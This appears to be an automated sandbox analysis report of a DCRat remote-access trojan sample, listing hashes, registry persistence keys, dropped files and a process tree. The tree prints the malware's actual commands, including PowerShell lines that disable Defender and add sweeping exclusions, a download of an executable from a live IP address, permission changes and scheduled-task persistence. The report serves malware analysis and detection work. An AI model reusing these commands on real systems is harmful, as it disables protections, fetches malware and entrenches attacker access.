dcrat | 9a9ac0169117b67557d8ba9932d908df0df543542a649e16db365c2c4d9829cb

Analysis

max time kernel
209s
max time network
229s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
16-01-2023 18:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

5c9360467aba93db8eaa351b62b93afc
SHA1

cef8b31d41b2eb3bd1c1454a96afc43911db85ab
SHA256

b49c294afa4366bf02faccce77dedf2c9ba3d4aa4073c13fe22bd202821d94e6
SHA512

133dc14f6df1d898e968a09d4a60a32345a252031f57bb250674b98b38e338170f9b3e88b00c88acd5f7a3da72d58a078ae52b175af0c6e41e4ccc72f93538cb
SSDEEP

393216:U81/eXkkM7cGGBNpuXKhBqJ0CEZsXVqNIyc2KBcr27eEHTPI:U86MihuXCBe0CEYqNIygdrI

Score

10^/10

dcrat discovery exploit infostealer persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://45.81.224.130/any.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 5 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\", \"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\", \"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\", \"C:\\Windows\\DigitalLocker\\en-US\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\", \"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\", \"C:\\Windows\\DigitalLocker\\en-US\\dllhost.exe\", \"C:\\runtimeMonitor\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\", \"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\", \"C:\\Windows\\DigitalLocker\\en-US\\dllhost.exe\", \"C:\\runtimeMonitor\\services.exe\", \"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4456	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1840	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1236	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3020	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3712	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1828	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3404	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2680	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1152	4500	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5012	4500	schtasks.exe

DCRat payload 5 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\programdata\dc.exe	dcrat
C:\ProgramData\dc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral4/memory/4088-195-0x00000000008F0000-0x00000000009FC000-memory.dmp	dcrat

Executes dropped EXE 7 IoCs

Processes:

1.exeany.exedc.exeComdriverSvc.exewsappz.exemigrate.exeWmiic.exe

pid process

4212 1.exe
2604 any.exe
2260 dc.exe
4088 ComdriverSvc.exe
1904 wsappz.exe
4176 migrate.exe
1108 Wmiic.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

4832 icacls.exe
4932 icacls.exe
3472 icacls.exe
672 icacls.exe
4612 icacls.exe
4668 takeown.exe
2156 icacls.exe
4172 icacls.exe

pid	process
4212	1.exe
2604	any.exe
2260	dc.exe
4088	ComdriverSvc.exe
1904	wsappz.exe
4176	migrate.exe
1108	Wmiic.exe

pid	process
4832	icacls.exe
4932	icacls.exe
3472	icacls.exe
672	icacls.exe
4612	icacls.exe
4668	takeown.exe
2156	icacls.exe
4172	icacls.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

any.exedc.exeWScript.exemigrate.exetmp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	any.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	dc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	migrate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	tmp.exe

Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4612 icacls.exe
4668 takeown.exe
2156 icacls.exe
4172 icacls.exe
4832 icacls.exe
4932 icacls.exe
3472 icacls.exe
672 icacls.exe

pid	process
4612	icacls.exe
4668	takeown.exe
2156	icacls.exe
4172	icacls.exe
4832	icacls.exe
4932	icacls.exe
3472	icacls.exe
672	icacls.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\Saved Games\\fontdrvhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\runtimeMonitor\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files\\Windows Media Player\\Visualizations\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\DigitalLocker\\en-US\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\DigitalLocker\\en-US\\dllhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\runtimeMonitor\\services.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\runtimeMonitor\\dllhost.exe\""	ComdriverSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 3 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File opened for modification	C:\Program Files\Windows Media Player\Visualizations\cmd.exe	ComdriverSvc.exe
File created	C:\Program Files\Windows Media Player\Visualizations\ebf1f9fa8afd6d	ComdriverSvc.exe
File created	C:\Program Files\Windows Media Player\Visualizations\cmd.exe	ComdriverSvc.exe

Drops file in Windows directory 21 IoCs

Processes:

migrate.exeComdriverSvc.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\MSTask.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File created	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File opened for modification	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File created	C:\Windows\DigitalLocker\en-US\dllhost.exe	ComdriverSvc.exe
File created	C:\Windows\Tasks\__tmp_rar_sfx_access_check_240762656	migrate.exe
File opened for modification	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Tasks\Superfetch.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\WinRing0x64.sys	migrate.exe
File created	C:\Windows\DigitalLocker\en-US\5940a34987c991	ComdriverSvc.exe
File created	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\Tasks\Wmiic.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\Wrap.exe	migrate.exe
File created	C:\Windows\Tasks\ApplicationsFrameHost.exe	migrate.exe
File created	C:\Windows\Tasks\run.bat	migrate.exe
File created	C:\Windows\Tasks\Wrap.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\config.json	migrate.exe
File created	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File opened for modification	C:\Windows\Tasks\IntelConfigService.exe	migrate.exe
File created	C:\Windows\Tasks\MSTask.exe	migrate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4420	schtasks.exe
3712	schtasks.exe
4456	schtasks.exe
1236	schtasks.exe
3012	schtasks.exe
3020	schtasks.exe
1152	schtasks.exe
212	schtasks.exe
3404	schtasks.exe
2680	schtasks.exe
4152	schtasks.exe
5012	schtasks.exe
1840	schtasks.exe
1828	schtasks.exe
5068	schtasks.exe

Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

2300 timeout.exe
660 timeout.exe
1832 timeout.exe
2200 timeout.exe
2132 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

176 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1812 taskkill.exe
3064 taskkill.exe

pid	process
2300	timeout.exe
660	timeout.exe
1832	timeout.exe
2200	timeout.exe
2132	timeout.exe

pid	process
176	tasklist.exe

pid	process
1812	taskkill.exe
3064	taskkill.exe

Modifies registry class 8 IoCs

Processes:

wsappz.exedc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe
Key created	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings	dc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeComdriverSvc.exewsappz.exepowershell.exe

pid	process
3068	powershell.exe
3068	powershell.exe
3436	powershell.exe
3436	powershell.exe
2176	powershell.exe
2176	powershell.exe
3280	powershell.exe
3280	powershell.exe
4088	ComdriverSvc.exe
1904	wsappz.exe
1904	wsappz.exe
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exetasklist.exetaskkill.exetaskkill.exeComdriverSvc.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	2176	powershell.exe
Token: SeDebugPrivilege	176	tasklist.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	4088	ComdriverSvc.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	1760	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1.exe

pid process

4212 1.exe

pid	process
4212	1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exeany.exedc.execmd.exenet.exenet.exenet.exe

description	pid	process	target process
PID 2628 wrote to memory of 3068	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 3068	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 3068	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 3436	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 3436	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 3436	2628	tmp.exe	powershell.exe
PID 2628 wrote to memory of 4212	2628	tmp.exe	1.exe
PID 2628 wrote to memory of 4212	2628	tmp.exe	1.exe
PID 2628 wrote to memory of 4212	2628	tmp.exe	1.exe
PID 2628 wrote to memory of 4496	2628	tmp.exe	cmd.exe
PID 2628 wrote to memory of 4496	2628	tmp.exe	cmd.exe
PID 2628 wrote to memory of 4496	2628	tmp.exe	cmd.exe
PID 4496 wrote to memory of 3452	4496	cmd.exe	cmd.exe
PID 4496 wrote to memory of 3452	4496	cmd.exe	cmd.exe
PID 4496 wrote to memory of 3452	4496	cmd.exe	cmd.exe
PID 2628 wrote to memory of 2604	2628	tmp.exe	any.exe
PID 2628 wrote to memory of 2604	2628	tmp.exe	any.exe
PID 2628 wrote to memory of 2604	2628	tmp.exe	any.exe
PID 2628 wrote to memory of 2260	2628	tmp.exe	dc.exe
PID 2628 wrote to memory of 2260	2628	tmp.exe	dc.exe
PID 2628 wrote to memory of 2260	2628	tmp.exe	dc.exe
PID 3452 wrote to memory of 3388	3452	cmd.exe	chcp.com
PID 3452 wrote to memory of 3388	3452	cmd.exe	chcp.com
PID 3452 wrote to memory of 3388	3452	cmd.exe	chcp.com
PID 2604 wrote to memory of 3412	2604	any.exe	cmd.exe
PID 2604 wrote to memory of 3412	2604	any.exe	cmd.exe
PID 2604 wrote to memory of 3412	2604	any.exe	cmd.exe
PID 2260 wrote to memory of 3532	2260	dc.exe	WScript.exe
PID 2260 wrote to memory of 3532	2260	dc.exe	WScript.exe
PID 2260 wrote to memory of 3532	2260	dc.exe	WScript.exe
PID 3452 wrote to memory of 4992	3452	cmd.exe	cmd.exe
PID 3452 wrote to memory of 4992	3452	cmd.exe	cmd.exe
PID 3452 wrote to memory of 4992	3452	cmd.exe	cmd.exe
PID 3452 wrote to memory of 4752	3452	cmd.exe	findstr.exe
PID 3452 wrote to memory of 4752	3452	cmd.exe	findstr.exe
PID 3452 wrote to memory of 4752	3452	cmd.exe	findstr.exe
PID 3412 wrote to memory of 4896	3412	cmd.exe	chcp.com
PID 3412 wrote to memory of 4896	3412	cmd.exe	chcp.com
PID 3412 wrote to memory of 4896	3412	cmd.exe	chcp.com
PID 3452 wrote to memory of 2176	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2176	3452	cmd.exe	powershell.exe
PID 3452 wrote to memory of 2176	3452	cmd.exe	powershell.exe
PID 3412 wrote to memory of 1152	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 1152	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 1152	3412	cmd.exe	net.exe
PID 1152 wrote to memory of 3688	1152	net.exe	net1.exe
PID 1152 wrote to memory of 3688	1152	net.exe	net1.exe
PID 1152 wrote to memory of 3688	1152	net.exe	net1.exe
PID 3412 wrote to memory of 1888	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 1888	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 1888	3412	cmd.exe	net.exe
PID 1888 wrote to memory of 764	1888	net.exe	net1.exe
PID 1888 wrote to memory of 764	1888	net.exe	net1.exe
PID 1888 wrote to memory of 764	1888	net.exe	net1.exe
PID 3412 wrote to memory of 3112	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 3112	3412	cmd.exe	net.exe
PID 3412 wrote to memory of 3112	3412	cmd.exe	net.exe
PID 3112 wrote to memory of 3668	3112	net.exe	net1.exe
PID 3112 wrote to memory of 3668	3112	net.exe	net1.exe
PID 3112 wrote to memory of 3668	3112	net.exe	net1.exe
PID 3412 wrote to memory of 1812	3412	cmd.exe	taskkill.exe
PID 3412 wrote to memory of 1812	3412	cmd.exe	taskkill.exe
PID 3412 wrote to memory of 1812	3412	cmd.exe	taskkill.exe
PID 3452 wrote to memory of 176	3452	cmd.exe	tasklist.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:4496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:3452

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:3388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:4992

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:4752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:176

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1176

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4668

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2300

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2156

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4172

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4832

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3472

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:672

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4612

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:660

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "
5⤵
PID:4280

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:2200

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
- Executes dropped EXE
PID:1108

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:2132

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\programdata\any.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:3412

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4896

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:3688

C:\Windows\SysWOW64\net.exe
net stop TaskScs
4⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskScs
5⤵
PID:764

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
- Suspicious use of WriteProcessMemory
PID:3112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:3668

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit1.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3064

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell cmd.exe /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
5⤵
PID:3148

C:\ProgramData\wsappz.exe
C:\ProgramData\wsappz.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
6⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:1904

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2260

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\runtimeMonitor\eW0NlR3z8rHah1r0tet2KhNAo.vbe"
3⤵
- Checks computer location settings
PID:3532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\runtimeMonitor\PsYm20I.bat" "
4⤵
PID:4836

C:\runtimeMonitor\ComdriverSvc.exe
"C:\runtimeMonitor\ComdriverSvc.exe"
5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\Visualizations\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Visualizations\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\Visualizations\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Saved Games\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4420

C:\Windows\system32\schtasks.exe
